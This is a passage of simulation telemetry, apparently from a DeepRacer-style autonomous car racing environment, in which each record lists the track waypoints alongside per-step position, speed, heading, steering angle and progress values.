3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.113037208643439, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9581620420269243, 'all_wheels_on_track': True, 'distance_from_center': 2.42061961851892e-05, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096329005125809, 'object_in_camera': False, 'heading': -0.20270984620429464, 'objects_speed': [], 'progress': 0.7156522898480779, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': -30.0, 'steps': 1.0},
{'is_left_of_center': False, 'projection_distance': 0.14390030350019378, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1170200743079786, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9558374100872313, 'all_wheels_on_track': True, 'distance_from_center': 0.0023336167208049628, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096318089179309, 'object_in_camera': False, 'heading': -0.825491610728565, 'objects_speed': [], 'progress': 0.7360704569032253, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 2.0},
{'is_left_of_center': False, 'projection_distance': 0.15196206004735874, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 1.3333333333333333, 'x': 3.125078911758613, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.955057360318226, 'all_wheels_on_track': True, 'distance_from_center': 0.0030828964229950976, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096296043067686, 'object_in_camera': False, 'heading': -0.9884467304532386, 'objects_speed': [], 'progress': 0.7773074847674944, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 20.0, 'steps': 3.0},
{'is_left_of_center': False, 'projection_distance': 0.16912750229283322, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 0.6666666666666666, 'x': 3.1422415816125593, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9542983635625084, 'all_wheels_on_track': True, 'distance_from_center': 0.0037763696438425478, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096249101529135, 'object_in_camera': False, 'heading': -1.144017253009116, 'objects_speed': [], 'progress': 0.8651111558456122, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [0, 1], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 4.0},
{'is_left_of_center': False, 'projection_distance': 0.20191403063825683, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.175030705920951, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9531424221266476, 'all_wheels_on_track': True, 'distance_from_center': 0.004816122658064441, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096159441726402, 'object_in_camera': False, 'heading': -1.274013521940257, 'objects_speed': [], 'progress': 1.0328188973338295, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 5.0},
{'is_left_of_center': False, 'projection_distance': 0.23782031815517216, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2109317593475533, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.9509277885376232, 'all_wheels_on_track': True, 'distance_from_center': 0.006944210021401, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6096061250441126, 'object_in_camera': False, 'heading': -1.6277243413174938, 'objects_speed': [], 'progress': 1.216484649353865, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 30.0, 'steps': 6.0},
{'is_left_of_center': False, 'projection_distance': 0.3043395330840337, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 2.3671952090825386), (8.538760870928513, 2.563413656113056), (8.537808603483967, 2.75963888567523), (8.532572489045293, 2.95569387369283), (8.51481039514374, 3.15055503924561), (8.475491090199, 3.341414414227855), (8.407975057079398, 3.5247578720951225), (8.31106120632191, 3.693881267878382), (8.186502531679764, 3.844170542185153), (8.037129092933212, 3.969503006795976), (7.868136309330993, 4.066595722602571), (7.6851610460393545, 4.1345014606124835), (7.494133948738579, 4.175703983918254), (7.299554742716083, 4.195335731117524), (7.103587636930088, 4.201242347257079), (6.907607353654015, 4.201247579495785), (6.711783262392657, 4.199924210676329), (6.516154120469764, 4.199300605337186), (6.3205893157042965, 4.199124065727503), (6.125061330396392, 4.199215533011554), (5.929553692683456, 4.199390716114905), (5.734056325661314, 4.199555822314082), (5.538567872823634, 4.1996779078838955), (5.343080582705667, 4.199756585251109), (5.147595618027125, 4.199802318893134), (4.952113560147865, 4.199816465316303), (4.756630145762273, 4.199800962386803), (4.561147894096393, 4.19975794175744), (4.365664285924183, 4.199686628281739), (4.170183390764635, 4.199580045641426), (3.974701139098755, 4.1994405192759245), (3.779218887432876, 4.199264948599335), (3.5837366357669964, 4.199009925409058), (3.3881109820032407, 4.198595803404785), (3.3881109820032407, 4.198595803404785), (3.1927025630391057, 4.198236329227001), (2.997255774324458, 4.197737328683715), (2.801790188307791, 4.197125156755078), (2.6062952436183835, 4.195692686069265), (2.410804949807826, 4.190964292571721), (2.2150827903079318, 4.183555248776983), (2.0190451461927097, 4.16967140647651), (1.8255455254232797, 4.1381578265350925), (1.6399065197169342, 4.077816355401538), (1.4684209619443997, 3.98580995697732), (1.316564535251782, 3.863567226215878), (1.18828627180266, 3.716441712246848), (1.087181058714844, 3.5495077176822467), (1.0159622477774413, 3.3684589840609287), (0.9734102913519926, 3.178145699770326), (0.9534938958331036, 2.9834065228940503), (0.9444216541596013, 2.7872029974331767), (0.9405074066940884, 2.5907339843046135), (0.9396984929007637, 2.3942255355991335), (0.9471365077950047, 2.1980486557983383), (0.9667406161777752, 2.003330698556816), (1.008643508547042, 1.8129062776403588), (1.0777365771700467, 1.6310002804643384), (1.1746683531897695, 1.460860280079107), (1.2993533282606862, 1.3105290994160301), (1.4485447529255744, 1.1851194108376364), (1.618276541798405, 1.0898755162672418), (1.80267831683733, 1.026955253927975), (1.9950098887622332, 0.9923725057420933), (2.190220548481932, 0.9752908935522877), (2.3860145059240736, 0.9666594679897911), (2.581804490740531, 0.9621571992530031), (2.77751667022956, 0.9599051322865064), (2.973129727863096, 0.9587203451227853)], 'speed': 2.0, 'x': 3.2774576092278784, 'is_crashed': False, 'is_reversed': False, 'objects_heading': [], 'y': 0.953600119077487, 'all_wheels_on_track': True, 'distance_from_center': 0.00411152612414604, 'objects_distance_from_center': [], 'objects_distance': [], 'closest_objects': [0, 0], 'track_width': 0.6095879343380803, 'object_in_camera': False, 'heading': -0.5769436778572566, 'objects_speed': [], 'progress': 1.5567398658792773, 'is_offtrack': False, 'objects_left_of_center': [], 'objects_location': [], 'closest_waypoints': [1, 2], 'track_length': 19.549800178858835, 'steering_angle': 9.999999999999998, 'steps': 7.0},
{'is_left_of_center': True, 'projection_distance': 0.38718280457705984, 'waypoints': [(2.973129727863096, 0.9587203451227853), (3.1686550001583385, 0.957973927514008), (3.3641587621388993, 0.957502662680531), (3.5596536099349976, 0.9571676056167091), (3.7551399311198708, 0.9569079073242543), (3.9506256709448877, 0.9566988842326032), (4.146107922610766, 0.9565304352142532), (4.341591530782978, 0.9563990236634121), (4.537073588662238, 0.9563010645276331), (4.732557196834449, 0.9562337963475989), (4.92803925471371, 0.9561973644632735), (5.123521506379589, 0.9561847441097273), (5.3190037580454685, 0.9562067146676283), (5.514486009711348, 0.9562466104877638), (5.709974462549027, 0.9563314648034498), (5.905463109173326, 0.9564632639275283), (6.10095815075604, 0.9566372843111675), (6.296465594682358, 0.956848729735553), (6.491997261936018, 0.9569796325965199), (6.6875785385640825, 0.9567336689306691), (6.883257677434614, 0.9557806263396478), (7.079130990497134, 0.9538671530427651), (7.275221344572657, 0.9543163504250318), (7.4705043835944585, 0.968040367211689), (7.662157411673801, 1.00506531126039), (7.845235769446617, 1.0715002572806311), (8.014446369208315, 1.1684281333446516), (8.165421648145468, 1.2924605804235763), (8.294117279524725, 1.4398041043387009), (8.397584218581926, 1.6056121986483556), (8.469351930116943, 1.7860276860462465), (8.511767170082862, 1.9763842816461406), (8.530750119682551, 2.1709724987464085), (8.535956778555175, 